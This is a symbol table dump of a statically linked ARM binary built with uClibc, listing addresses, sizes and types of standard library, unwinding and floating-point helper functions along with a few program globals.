C.25.4058	.symtab	0x236ac	9	OBJECT	<unknown>	DEFAULT	4
C.30.5698	.symtab	0x21950	44	OBJECT	<unknown>	DEFAULT	4
C.31.5699	.symtab	0x2192c	36	OBJECT	<unknown>	DEFAULT	4
C.5.5083	.symtab	0x23960	24	OBJECT	<unknown>	DEFAULT	4
C.7.5370	.symtab	0x245e8	12	OBJECT	<unknown>	DEFAULT	4
C.7.6078	.symtab	0x23978	12	OBJECT	<unknown>	DEFAULT	4
C.7.6109	.symtab	0x24918	12	OBJECT	<unknown>	DEFAULT	4
C.7.6182	.symtab	0x248f4	12	OBJECT	<unknown>	DEFAULT	4
C.8.6110	.symtab	0x2490c	12	OBJECT	<unknown>	DEFAULT	4
C.9.6119	.symtab	0x24900	12	OBJECT	<unknown>	DEFAULT	4
LOCAL_ADDR	.symtab	0x30874	4	OBJECT	<unknown>	DEFAULT	14
Laligned	.symtab	0x17988	0	NOTYPE	<unknown>	DEFAULT	2
Llastword	.symtab	0x179a4	0	NOTYPE	<unknown>	DEFAULT	2
_Exit	.symtab	0x1b6b0	104	FUNC	<unknown>	DEFAULT	2
_GLOBAL_OFFSET_TABLE_	.symtab	0x2cac8	0	OBJECT	<unknown>	HIDDEN	12
_Jv_RegisterClasses	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_READ.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_Unwind_Complete	.symtab	0x20444	4	FUNC	<unknown>	HIDDEN	2
_Unwind_DeleteException	.symtab	0x20448	44	FUNC	<unknown>	HIDDEN	2
_Unwind_ForcedUnwind	.symtab	0x210f8	36	FUNC	<unknown>	HIDDEN	2
_Unwind_GetCFA	.symtab	0x2043c	8	FUNC	<unknown>	HIDDEN	2
_Unwind_GetDataRelBase	.symtab	0x20480	12	FUNC	<unknown>	HIDDEN	2
_Unwind_GetLanguageSpecificData	.symtab	0x2111c	68	FUNC	<unknown>	HIDDEN	2
_Unwind_GetRegionStart	.symtab	0x218bc	52	FUNC	<unknown>	HIDDEN	2
_Unwind_GetTextRelBase	.symtab	0x20474	12	FUNC	<unknown>	HIDDEN	2
_Unwind_RaiseException	.symtab	0x2108c	36	FUNC	<unknown>	HIDDEN	2
_Unwind_Resume	.symtab	0x210b0	36	FUNC	<unknown>	HIDDEN	2
_Unwind_Resume_or_Rethrow	.symtab	0x210d4	36	FUNC	<unknown>	HIDDEN	2
_Unwind_VRS_Get	.symtab	0x203a4	76	FUNC	<unknown>	HIDDEN	2
_Unwind_VRS_Pop	.symtab	0x209bc	324	FUNC	<unknown>	HIDDEN	2
_Unwind_VRS_Set	.symtab	0x203f0	76	FUNC	<unknown>	HIDDEN	2
_WRITE.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_b	.symtab	0x2cc30	4	OBJECT	<unknown>	DEFAULT	13
__C_ctype_b.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_b_data	.symtab	0x245f4	768	OBJECT	<unknown>	DEFAULT	4
__EH_FRAME_BEGIN__	.symtab	0x2cab8	0	OBJECT	<unknown>	DEFAULT	7
__FRAME_END__	.symtab	0x2cab8	0	OBJECT	<unknown>	DEFAULT	7
__GI___C_ctype_b	.symtab	0x2cc30	4	OBJECT	<unknown>	HIDDEN	13
__GI___close	.symtab	0x1ac30	100	FUNC	<unknown>	HIDDEN	2
__GI___close_nocancel	.symtab	0x1ac14	24	FUNC	<unknown>	HIDDEN	2
__GI___ctype_b	.symtab	0x2cc34	4	OBJECT	<unknown>	HIDDEN	13
__GI___errno_location	.symtab	0x1661c	32	FUNC	<unknown>	HIDDEN	2
__GI___fcntl_nocancel	.symtab	0x15b1c	152	FUNC	<unknown>	HIDDEN	2
__GI___fgetc_unlocked	.symtab	0x1e044	300	FUNC	<unknown>	HIDDEN	2
__GI___glibc_strerror_r	.symtab	0x17c58	24	FUNC	<unknown>	HIDDEN	2
__GI___libc_close	.symtab	0x1ac30	100	FUNC	<unknown>	HIDDEN	2
__GI___libc_fcntl	.symtab	0x15bb4	244	FUNC	<unknown>	HIDDEN	2
__GI___libc_open	.symtab	0x1acc0	100	FUNC	<unknown>	HIDDEN	2
__GI___libc_read	.symtab	0x1ade0	100	FUNC	<unknown>	HIDDEN	2
__GI___libc_write	.symtab	0x1ad50	100	FUNC	<unknown>	HIDDEN	2
__GI___open	.symtab	0x1acc0	100	FUNC	<unknown>	HIDDEN	2
__GI___open_nocancel	.symtab	0x1aca4	24	FUNC	<unknown>	HIDDEN	2
__GI___read	.symtab	0x1ade0	100	FUNC	<unknown>	HIDDEN	2
__GI___read_nocancel	.symtab	0x1adc4	24	FUNC	<unknown>	HIDDEN	2
__GI___sigaddset	.symtab	0x185b0	36	FUNC	<unknown>	HIDDEN	2
__GI___sigdelset	.symtab	0x185d4	36	FUNC	<unknown>	HIDDEN	2
__GI___sigismember	.symtab	0x1858c	36	FUNC	<unknown>	HIDDEN	2
__GI___uClibc_fini	.symtab	0x1aff8	124	FUNC	<unknown>	HIDDEN	2
__GI___uClibc_init	.symtab	0x1b0c8	88	FUNC	<unknown>	HIDDEN	2
__GI___write	.symtab	0x1ad50	100	FUNC	<unknown>	HIDDEN	2
__GI___write_nocancel	.symtab	0x1ad34	24	FUNC	<unknown>	HIDDEN	2
__GI___xpg_strerror_r	.symtab	0x17c70	268	FUNC	<unknown>	HIDDEN	2
__GI__exit	.symtab	0x1b6b0	104	FUNC	<unknown>	HIDDEN	2
__GI_abort	.symtab	0x19988	296	FUNC	<unknown>	HIDDEN	2
__GI_accept	.symtab	0x17e90	116	FUNC	<unknown>	HIDDEN	2
__GI_atoi	.symtab	0x19ab0	32	FUNC	<unknown>	HIDDEN	2
__GI_bind	.symtab	0x17f04	68	FUNC	<unknown>	HIDDEN	2
__GI_brk	.symtab	0x1f0a4	88	FUNC	<unknown>	HIDDEN	2
__GI_chdir	.symtab	0x15ca8	56	FUNC	<unknown>	HIDDEN	2
__GI_close	.symtab	0x1ac30	100	FUNC	<unknown>	HIDDEN	2
__GI_closedir	.symtab	0x1612c	272	FUNC	<unknown>	HIDDEN	2
__GI_config_close	.symtab	0x1c008	52	FUNC	<unknown>	HIDDEN	2
__GI_config_open	.symtab	0x1c03c	72	FUNC	<unknown>	HIDDEN	2
__GI_config_read	.symtab	0x1bce0	808	FUNC	<unknown>	HIDDEN	2
__GI_connect	.symtab	0x17f8c	116	FUNC	<unknown>	HIDDEN	2
__GI_exit	.symtab	0x19cc4	196	FUNC	<unknown>	HIDDEN	2
__GI_fclose	.symtab	0x1c1b8	816	FUNC	<unknown>	HIDDEN	2
__GI_fcntl	.symtab	0x15bb4	244	FUNC	<unknown>	HIDDEN	2
__GI_fflush_unlocked	.symtab	0x1dc98	940	FUNC	<unknown>	HIDDEN	2
__GI_fgetc	.symtab	0x1d788	324	FUNC	<unknown>	HIDDEN	2
__GI_fgetc_unlocked	.symtab	0x1e044	300	FUNC	<unknown>	HIDDEN	2
__GI_fgets	.symtab	0x1d8cc	284	FUNC	<unknown>	HIDDEN	2
__GI_fgets_unlocked	.symtab	0x1e170	160	FUNC	<unknown>	HIDDEN	2
__GI_fopen	.symtab	0x1c4e8	32	FUNC	<unknown>	HIDDEN	2
__GI_fork	.symtab	0x1a548	972	FUNC	<unknown>	HIDDEN	2
__GI_fputs_unlocked	.symtab	0x17794	56	FUNC	<unknown>	HIDDEN	2
__GI_fseek	.symtab	0x1f250	36	FUNC	<unknown>	HIDDEN	2
__GI_fseeko64	.symtab	0x1f274	448	FUNC	<unknown>	HIDDEN	2
__GI_fstat	.symtab	0x1b718	100	FUNC	<unknown>	HIDDEN	2
__GI_fwrite_unlocked	.symtab	0x177cc	188	FUNC	<unknown>	HIDDEN	2
__GI_getc_unlocked	.symtab	0x1e044	300	FUNC	<unknown>	HIDDEN	2
__GI_getdtablesize	.symtab	0x1b81c	44	FUNC	<unknown>	HIDDEN	2
__GI_getegid	.symtab	0x1b848	20	FUNC	<unknown>	HIDDEN	2
__GI_geteuid	.symtab	0x1b85c	20	FUNC	<unknown>	HIDDEN	2
__GI_getgid	.symtab	0x1b870	20	FUNC	<unknown>	HIDDEN	2
__GI_getpagesize	.symtab	0x1b884	40	FUNC	<unknown>	HIDDEN	2
__GI_getpid	.symtab	0x1a9ac	72	FUNC	<unknown>	HIDDEN	2
__GI_getrlimit	.symtab	0x1b8ac	56	FUNC	<unknown>	HIDDEN	2
__GI_getsockname	.symtab	0x18000	68	FUNC	<unknown>	HIDDEN	2
__GI_gettimeofday	.symtab	0x1b8e4	64	FUNC	<unknown>	HIDDEN	2
__GI_getuid	.symtab	0x1b924	20	FUNC	<unknown>	HIDDEN	2
__GI_inet_addr	.symtab	0x17e24	40	FUNC	<unknown>	HIDDEN	2
__GI_inet_aton	.symtab	0x1ebdc	248	FUNC	<unknown>	HIDDEN	2
__GI_inet_ntoa	.symtab	0x17e08	28	FUNC	<unknown>	HIDDEN	2
__GI_inet_ntoa_r	.symtab	0x17d7c	140	FUNC	<unknown>	HIDDEN	2
__GI_ioctl	.symtab	0x15cf4	224	FUNC	<unknown>	HIDDEN	2
__GI_isatty	.symtab	0x1eb3c	36	FUNC	<unknown>	HIDDEN	2
__GI_kill	.symtab	0x15dd4	56	FUNC	<unknown>	HIDDEN	2
__GI_listen	.symtab	0x1808c	64	FUNC	<unknown>	HIDDEN	2
__GI_lseek	.symtab	0x1b938	64	FUNC	<unknown>	HIDDEN	2
__GI_lseek64	.symtab	0x1f7a4	112	FUNC	<unknown>	HIDDEN	2
__GI_memchr	.symtab	0x1e6b0	240	FUNC	<unknown>	HIDDEN	2
__GI_memcpy	.symtab	0x17890	4	FUNC	<unknown>	HIDDEN	2
__GI_memmove	.symtab	0x1e6a0	4	FUNC	<unknown>	HIDDEN	2
__GI_mempcpy	.symtab	0x1f740	36	FUNC	<unknown>	HIDDEN	2
__GI_memrchr	.symtab	0x1e7a0	224	FUNC	<unknown>	HIDDEN	2
__GI_memset	.symtab	0x178a0	156	FUNC	<unknown>	HIDDEN	2
__GI_mmap	.symtab	0x1b50c	124	FUNC	<unknown>	HIDDEN	2
__GI_mremap	.symtab	0x1b978	68	FUNC	<unknown>	HIDDEN	2
__GI_munmap	.symtab	0x1b9bc	64	FUNC	<unknown>	HIDDEN	2
__GI_nanosleep	.symtab	0x15e4c	96	FUNC	<unknown>	HIDDEN	2
__GI_open	.symtab	0x1acc0	100	FUNC	<unknown>	HIDDEN	2
__GI_opendir	.symtab	0x1630c	196	FUNC	<unknown>	HIDDEN	2
__GI_raise	.symtab	0x1a9f4	240	FUNC	<unknown>	HIDDEN	2
__GI_read	.symtab	0x1ade0	100	FUNC	<unknown>	HIDDEN	2
__GI_readdir	.symtab	0x16480	232	FUNC	<unknown>	HIDDEN	2
__GI_readdir64	.symtab	0x1bbf4	236	FUNC	<unknown>	HIDDEN	2
__GI_readlink	.symtab	0x15ef0	64	FUNC	<unknown>	HIDDEN	2
__GI_recv	.symtab	0x18110	112	FUNC	<unknown>	HIDDEN	2
__GI_recvfrom	.symtab	0x181c8	136	FUNC	<unknown>	HIDDEN	2
__GI_sbrk	.symtab	0x1b9fc	108	FUNC	<unknown>	HIDDEN	2
__GI_select	.symtab	0x15fac	132	FUNC	<unknown>	HIDDEN	2
__GI_send	.symtab	0x18294	112	FUNC	<unknown>	HIDDEN	2
__GI_sendto	.symtab	0x18350	136	FUNC	<unknown>	HIDDEN	2
__GI_setsid	.symtab	0x16030	64	FUNC	<unknown>	HIDDEN	2
__GI_setsockopt	.symtab	0x183d8	72	FUNC	<unknown>	HIDDEN	2
__GI_sigaction	.symtab	0x1b5b4	136	FUNC	<unknown>	HIDDEN	2
__GI_sigaddset	.symtab	0x18464	80	FUNC	<unknown>	HIDDEN	2
__GI_sigemptyset	.symtab	0x184b4	20	FUNC	<unknown>	HIDDEN	2
__GI_signal	.symtab	0x184c8	196	FUNC	<unknown>	HIDDEN	2
__GI_sigprocmask	.symtab	0x16070	140	FUNC	<unknown>	HIDDEN	2
__GI_sleep	.symtab	0x1aae4	300	FUNC	<unknown>	HIDDEN	2
__GI_snprintf	.symtab	0x16670	48	FUNC	<unknown>	HIDDEN	2
__GI_socket	.symtab	0x18420	68	FUNC	<unknown>	HIDDEN	2
__GI_strchr	.symtab	0x1e880	240	FUNC	<unknown>	HIDDEN	2
__GI_strchrnul	.symtab	0x1e970	236	FUNC	<unknown>	HIDDEN	2
__GI_strcmp	.symtab	0x17940	28	FUNC	<unknown>	HIDDEN	2
__GI_strcoll	.symtab	0x17940	28	FUNC	<unknown>	HIDDEN	2
__GI_strcspn	.symtab	0x1ea5c	68	FUNC	<unknown>	HIDDEN	2
__GI_strlen	.symtab	0x17960	96	FUNC	<unknown>	HIDDEN	2
__GI_strncmp	.symtab	0x179c0	272	FUNC	<unknown>	HIDDEN	2
__GI_strncpy	.symtab	0x17ad0	188	FUNC	<unknown>	HIDDEN	2
__GI_strnlen	.symtab	0x17b8c	204	FUNC	<unknown>	HIDDEN	2
__GI_strrchr	.symtab	0x1eaa0	80	FUNC	<unknown>	HIDDEN	2
__GI_strspn	.symtab	0x1eaf0	76	FUNC	<unknown>	HIDDEN	2
__GI_strtol	.symtab	0x19ad0	28	FUNC	<unknown>	HIDDEN	2
__GI_sysconf	.symtab	0x19ed4	1572	FUNC	<unknown>	HIDDEN	2
__GI_tcgetattr	.symtab	0x1eb60	124	FUNC	<unknown>	HIDDEN	2
__GI_time	.symtab	0x160fc	48	FUNC	<unknown>	HIDDEN	2
__GI_times	.symtab	0x1ba68	20	FUNC	<unknown>	HIDDEN	2
__GI_vsnprintf	.symtab	0x166a0	208	FUNC	<unknown>	HIDDEN	2
__GI_wcrtomb	.symtab	0x1c084	84	FUNC	<unknown>	HIDDEN	2
__GI_wcsnrtombs	.symtab	0x1c0fc	188	FUNC	<unknown>	HIDDEN	2
__GI_wcsrtombs	.symtab	0x1c0d8	36	FUNC	<unknown>	HIDDEN	2
__GI_write	.symtab	0x1ad50	100	FUNC	<unknown>	HIDDEN	2
__JCR_END__	.symtab	0x2cac4	0	OBJECT	<unknown>	DEFAULT	11
__JCR_LIST__	.symtab	0x2cac4	0	OBJECT	<unknown>	DEFAULT	11
___Unwind_ForcedUnwind	.symtab	0x210f8	36	FUNC	<unknown>	HIDDEN	2
___Unwind_RaiseException	.symtab	0x2108c	36	FUNC	<unknown>	HIDDEN	2
___Unwind_Resume	.symtab	0x210b0	36	FUNC	<unknown>	HIDDEN	2
___Unwind_Resume_or_Rethrow	.symtab	0x210d4	36	FUNC	<unknown>	HIDDEN	2
__adddf3	.symtab	0x1f964	784	FUNC	<unknown>	HIDDEN	2
__aeabi_cdcmpeq	.symtab	0x202c0	24	FUNC	<unknown>	HIDDEN	2
__aeabi_cdcmple	.symtab	0x202c0	24	FUNC	<unknown>	HIDDEN	2
__aeabi_cdrcmple	.symtab	0x202a4	52	FUNC	<unknown>	HIDDEN	2
__aeabi_d2uiz	.symtab	0x20350	84	FUNC	<unknown>	HIDDEN	2
__aeabi_dadd	.symtab	0x1f964	784	FUNC	<unknown>	HIDDEN	2
__aeabi_dcmpeq	.symtab	0x202d8	24	FUNC	<unknown>	HIDDEN	2
__aeabi_dcmpge	.symtab	0x20320	24	FUNC	<unknown>	HIDDEN	2
__aeabi_dcmpgt	.symtab	0x20338	24	FUNC	<unknown>	HIDDEN	2
__aeabi_dcmple	.symtab	0x20308	24	FUNC	<unknown>	HIDDEN	2
__aeabi_dcmplt	.symtab	0x202f0	24	FUNC	<unknown>	HIDDEN	2
__aeabi_ddiv	.symtab	0x20004	524	FUNC	<unknown>	HIDDEN	2
__aeabi_dmul	.symtab	0x1fd74	656	FUNC	<unknown>	HIDDEN	2
__aeabi_drsub	.symtab	0x1f958	0	FUNC	<unknown>	HIDDEN	2
__aeabi_dsub	.symtab	0x1f960	788	FUNC	<unknown>	HIDDEN	2
__aeabi_f2d	.symtab	0x1fcc0	64	FUNC	<unknown>	HIDDEN	2
__aeabi_i2d	.symtab	0x1fc98	40	FUNC	<unknown>	HIDDEN	2
__aeabi_idiv	.symtab	0x1f814	0	FUNC	<unknown>	HIDDEN	2
__aeabi_idivmod	.symtab	0x1f940	24	FUNC	<unknown>	HIDDEN	2
__aeabi_l2d	.symtab	0x1fd14	96	FUNC	<unknown>	HIDDEN	2
__aeabi_read_tp	.symtab	0x1b660	8	FUNC	<unknown>	DEFAULT	2
__aeabi_ui2d	.symtab	0x1fc74	36	FUNC	<unknown>	HIDDEN	2
__aeabi_uidiv	.symtab	0x159f4	0	FUNC	<unknown>	HIDDEN	2
__aeabi_uidivmod	.symtab	0x15af0	24	FUNC	<unknown>	HIDDEN	2
__aeabi_ul2d	.symtab	0x1fd00	116	FUNC	<unknown>	HIDDEN	2
__aeabi_unwind_cpp_pr0	.symtab	0x21058	8	FUNC	<unknown>	HIDDEN	2
__aeabi_unwind_cpp_pr1	.symtab	0x21050	8	FUNC	<unknown>	HIDDEN	2
__aeabi_unwind_cpp_pr2	.symtab	0x21048	8	FUNC	<unknown>	HIDDEN	2
__app_fini	.symtab	0x2e304	4	OBJECT	<unknown>	HIDDEN	14
__atexit_lock	.symtab	0x2cc0c	24	OBJECT	<unknown>	DEFAULT	13
__bss_end__	.symtab	0x30ca8	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__bss_start	.symtab	0x2cd20	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__bss_start__	.symtab	0x2cd20	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__check_one_fd	.symtab	0x1b074	84	FUNC	<unknown>	DEFAULT	2
__close	.symtab	0x1ac30	100	FUNC	<unknown>	DEFAULT	2
__close_nocancel	.symtab	0x1ac14	24	FUNC	<unknown>	DEFAULT	2
__cmpdf2	.symtab	0x20220	132	FUNC	<unknown>	HIDDEN	2
__ctype_b	.symtab	0x2cc34	4	OBJECT	<unknown>	DEFAULT	13
__curbrk	.symtab	0x30868	4	OBJECT	<unknown>	HIDDEN	14
__cxa_begin_cleanup	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__cxa_call_unexpected	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__cxa_type_match	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__data_start	.symtab	0x2cb70	0	NOTYPE	<unknown>	DEFAULT	13
__default_rt_sa_restorer	.symtab	0x1b654	0	FUNC	<unknown>	DEFAULT	2
__default_sa_restorer	.symtab	0x1b648	0	FUNC	<unknown>	DEFAULT	2
__deregister_frame_info	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__div0	.symtab	0x15b08	20	FUNC	<unknown>	HIDDEN	2
__divdf3	.symtab	0x20004	524	FUNC	<unknown>	HIDDEN	2
__divsi3	.symtab	0x1f814	300	FUNC	<unknown>	HIDDEN	2
__do_global_dtors_aux	.symtab	0x80f0	0	FUNC	<unknown>	DEFAULT	2
__do_global_dtors_aux_fini_array_entry	.symtab	0x2cac0	0	OBJECT	<unknown>	DEFAULT	10
__end__	.symtab	0x30ca8	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__environ	.symtab	0x2e2fc	4	OBJECT	<unknown>	DEFAULT	14
__eqdf2	.symtab	0x20220	132	FUNC	<unknown>	HIDDEN	2
__errno_location	.symtab	0x1661c	32	FUNC	<unknown>	DEFAULT	2
__errno_location.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__exidx_end	.symtab	0x24ab8	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__exidx_start	.symtab	0x249a0	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__exit_cleanup	.symtab	0x2ddac	4	OBJECT	<unknown>	HIDDEN	14
__extendsfdf2	.symtab	0x1fcc0	64	FUNC	<unknown>	HIDDEN	2
__fcntl_nocancel	.symtab	0x15b1c	152	FUNC	<unknown>	DEFAULT	2
__fgetc_unlocked	.symtab	0x1e044	300	FUNC	<unknown>	DEFAULT	2
__fini_array_end	.symtab	0x2cac4	0	NOTYPE	<unknown>	HIDDEN	10
__fini_array_start	.symtab	0x2cac0	0	NOTYPE	<unknown>	HIDDEN	10
__fixunsdfsi	.symtab	0x20350	84	FUNC	<unknown>	HIDDEN	2
__floatdidf	.symtab	0x1fd14	96	FUNC	<unknown>	HIDDEN	2
__floatsidf	.symtab	0x1fc98	40	FUNC	<unknown>	HIDDEN	2
__floatundidf	.symtab	0x1fd00	116	FUNC	<unknown>	HIDDEN	2
__floatunsidf	.symtab	0x1fc74	36	FUNC	<unknown>	HIDDEN	2
__fork	.symtab	0x1a548	972	FUNC	<unknown>	DEFAULT	2
__fork_generation_pointer	.symtab	0x30c74	4	OBJECT	<unknown>	HIDDEN	14
__fork_handlers	.symtab	0x30c78	4	OBJECT	<unknown>	HIDDEN	14
__fork_lock	.symtab	0x2ddb0	4	OBJECT	<unknown>	HIDDEN	14
__frame_dummy_init_array_entry	.symtab	0x2cabc	0	OBJECT	<unknown>	DEFAULT	9
__gedf2	.symtab	0x20210	148	FUNC	<unknown>	HIDDEN	2
__getdents	.symtab	0x1b77c	160	FUNC	<unknown>	HIDDEN	2
__getdents64	.symtab	0x1f108	328	FUNC	<unknown>	HIDDEN	2
__getpagesize	.symtab	0x1b884	40	FUNC	<unknown>	DEFAULT	2
__getpid	.symtab	0x1a9ac	72	FUNC	<unknown>	DEFAULT	2
__glibc_strerror_r	.symtab	0x17c58	24	FUNC	<unknown>	DEFAULT	2
__glibc_strerror_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__gnu_Unwind_Find_exidx	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__gnu_Unwind_ForcedUnwind	.symtab	0x207fc	28	FUNC	<unknown>	HIDDEN	2
__gnu_Unwind_RaiseException	.symtab	0x208e4	184	FUNC	<unknown>	HIDDEN	2
__gnu_Unwind_Restore_VFP	.symtab	0x2107c	0	FUNC	<unknown>	HIDDEN	2
__gnu_Unwind_Resume	.symtab	0x20878	108	FUNC	<unknown>	HIDDEN	2
__gnu_Unwind_Resume_or_Rethrow	.symtab	0x2099c	32	FUNC	<unknown>	HIDDEN	2
__gnu_Unwind_Save_VFP	.symtab	0x21084	0	FUNC	<unknown>	HIDDEN	2
__gnu_unwind_execute	.symtab	0x21160	1812	FUNC	<unknown>	HIDDEN	2
__gnu_unwind_frame	.symtab	0x21874	72	FUNC	<unknown>	HIDDEN	2
__gnu_unwind_pr_common	.symtab	0x20b00	1352	FUNC	<unknown>	DEFAULT	2
__gtdf2	.symtab	0x20210	148	FUNC	<unknown>	HIDDEN	2
__h_errno_location	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__init_array_end	.symtab	0x2cac0	0	NOTYPE	<unknown>	HIDDEN	9
__init_array_start	.symtab	0x2cabc	0	NOTYPE	<unknown>	HIDDEN	9
__ledf2	.symtab	0x20218	140	FUNC	<unknown>	HIDDEN	2
__libc_accept	.symtab	0x17e90	116	FUNC	<unknown>	DEFAULT	2
__libc_close	.symtab	0x1ac30	100	FUNC	<unknown>	DEFAULT	2
__libc_connect	.symtab	0x17f8c	116	FUNC	<unknown>	DEFAULT	2
__libc_disable_asynccancel	.symtab	0x1ae50	136	FUNC	<unknown>	HIDDEN	2
__libc_enable_asynccancel	.symtab	0x1aed8	220	FUNC	<unknown>	HIDDEN	2
__libc_errno	.symtab	0x0	4	TLS	<unknown>	HIDDEN	8
__libc_fcntl	.symtab	0x15bb4	244	FUNC	<unknown>	DEFAULT	2
__libc_fork	.symtab	0x1a548	972	FUNC	<unknown>	DEFAULT	2
__libc_h_errno	.symtab	0x4	4	TLS	<unknown>	HIDDEN	8
__libc_multiple_threads	.symtab	0x30c7c	4	OBJECT	<unknown>	HIDDEN	14
__libc_nanosleep	.symtab	0x15e4c	96	FUNC	<unknown>	DEFAULT	2
__libc_open	.symtab	0x1acc0	100	FUNC	<unknown>	DEFAULT	2
__libc_read	.symtab	0x1ade0	100	FUNC	<unknown>	DEFAULT	2
__libc_recv	.symtab	0x18110	112	FUNC	<unknown>	DEFAULT	2
__libc_recvfrom	.symtab	0x181c8	136	FUNC	<unknown>	DEFAULT	2
__libc_select	.symtab	0x15fac	132	FUNC	<unknown>	DEFAULT	2
__libc_send	.symtab	0x18294	112	FUNC	<unknown>	DEFAULT	2
__libc_sendto	.symtab	0x18350	136	FUNC	<unknown>	DEFAULT	2
__libc_setup_tls	.symtab	0x1edd8	560	FUNC	<unknown>	DEFAULT	2
__libc_sigaction	.symtab	0x1b5b4	136	FUNC	<unknown>	DEFAULT	2
__libc_stack_end	.symtab	0x2e2f8	4	OBJECT	<unknown>	DEFAULT	14
__libc_write	.symtab	0x1ad50	100	FUNC	<unknown>	DEFAULT	2
__lll_lock_wait_private	.symtab	0x1a914	152	FUNC	<unknown>	HIDDEN	2
__ltdf2	.symtab	0x20218	140	FUNC	<unknown>	HIDDEN	2
__malloc_consolidate	.symtab	0x19558	436	FUNC	<unknown>	HIDDEN	2
__malloc_largebin_index	.symtab	0x185f8	120	FUNC	<unknown>	DEFAULT	2
__malloc_lock	.symtab	0x2cbdc	24	OBJECT	<unknown>	DEFAULT	13
__malloc_state	.symtab	0x308fc	888	OBJECT	<unknown>	DEFAULT	14
__malloc_trim	.symtab	0x194a8	176	FUNC	<unknown>	DEFAULT	2
__muldf3	.symtab	0x1fd74	656	FUNC	<unknown>	HIDDEN	2
__nedf2	.symtab	0x20220	132	FUNC	<unknown>	HIDDEN	2
__nptl_deallocate_tsd	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__nptl_nthreads	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__open	.symtab	0x1acc0	100	FUNC	<unknown>	DEFAULT	2
__open_nocancel	.symtab	0x1aca4	24	FUNC	<unknown>	DEFAULT	2
__pagesize	.symtab	0x2e300	4	OBJECT	<unknown>	DEFAULT	14
__preinit_array_end	.symtab	0x2cabc	0	NOTYPE	<unknown>	HIDDEN	8
__preinit_array_start	.symtab	0x2cabc	0	NOTYPE	<unknown>	HIDDEN	8
__progname	.symtab	0x2cc28	4	OBJECT	<unknown>	DEFAULT	13
__progname_full	.symtab	0x2cc2c	4	OBJECT	<unknown>	DEFAULT	13
__pthread_initialize_minimal	.symtab	0x1f008	12	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_init	.symtab	0x1afbc	8	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_lock	.symtab	0x1afb4	8	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_trylock	.symtab	0x1afb4	8	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_unlock	.symtab	0x1afb4	8	FUNC	<unknown>	DEFAULT	2
__pthread_return_0	.symtab	0x1afb4	8	FUNC	<unknown>	DEFAULT	2
__pthread_unwind	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__read	.symtab	0x1ade0	100	FUNC	<unknown>	DEFAULT	2
__read_nocancel	.symtab	0x1adc4	24	FUNC	<unknown>	DEFAULT	2
__register_frame_info	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__restore_core_regs	.symtab	0x21060	28	FUNC	<unknown>	HIDDEN	2
__rtld_fini	.symtab	0x2e308	4	OBJECT	<unknown>	HIDDEN	14
__sigaddset	.symtab	0x185b0	36	FUNC	<unknown>	DEFAULT	2
__sigdelset	.symtab	0x185d4	36	FUNC	<unknown>	DEFAULT	2
__sigismember	.symtab	0x1858c	36	FUNC	<unknown>	DEFAULT	2
__sigjmp_save	.symtab	0x1f764	64	FUNC	<unknown>	HIDDEN	2
__sigsetjmp	.symtab	0x1f0fc	12	FUNC	<unknown>	DEFAULT	2
__stdin	.symtab	0x2cc48	4	OBJECT	<unknown>	DEFAULT	13
__stdio_READ	.symtab	0x1f434	88	FUNC	<unknown>	HIDDEN	2
__stdio_WRITE	.symtab	0x1f48c	220	FUNC	<unknown>	HIDDEN	2
__stdio_adjust_position	.symtab	0x1f568	200	FUNC	<unknown>	HIDDEN	2
__stdio_fwrite	.symtab	0x1c968	320	FUNC	<unknown>	HIDDEN	2
__stdio_rfill	.symtab	0x1f630	48	FUNC	<unknown>	HIDDEN	2
__stdio_seek	.symtab	0x1f704	60	FUNC	<unknown>	HIDDEN	2
__stdio_trans2r_o	.symtab	0x1f660	164	FUNC	<unknown>	HIDDEN	2
__stdio_trans2w_o	.symtab	0x1cc8c	220	FUNC	<unknown>	HIDDEN	2
__stdio_wcommit	.symtab	0x1cd68	48	FUNC	<unknown>	HIDDEN	2
__stdout	.symtab	0x2cc4c	4	OBJECT	<unknown>	DEFAULT	13
__subdf3	.symtab	0x1f960	788	FUNC	<unknown>	HIDDEN	2
__sys_accept	.symtab	0x17e4c	68	FUNC	<unknown>	DEFAULT	2
__sys_connect	.symtab	0x17f48	68	FUNC	<unknown>	DEFAULT	2
__sys_recv	.symtab	0x180cc	68	FUNC	<unknown>	DEFAULT	2
__sys_recvfrom	.symtab	0x18180	72	FUNC	<unknown>	DEFAULT	2
__sys_send	.symtab	0x18250	68	FUNC	<unknown>	DEFAULT	2
__sys_sendto	.symtab	0x18304	76	FUNC	<unknown>	DEFAULT	2
__syscall_error	.symtab	0x1b588	44	FUNC	<unknown>	HIDDEN	2
__syscall_error.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__syscall_fcntl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
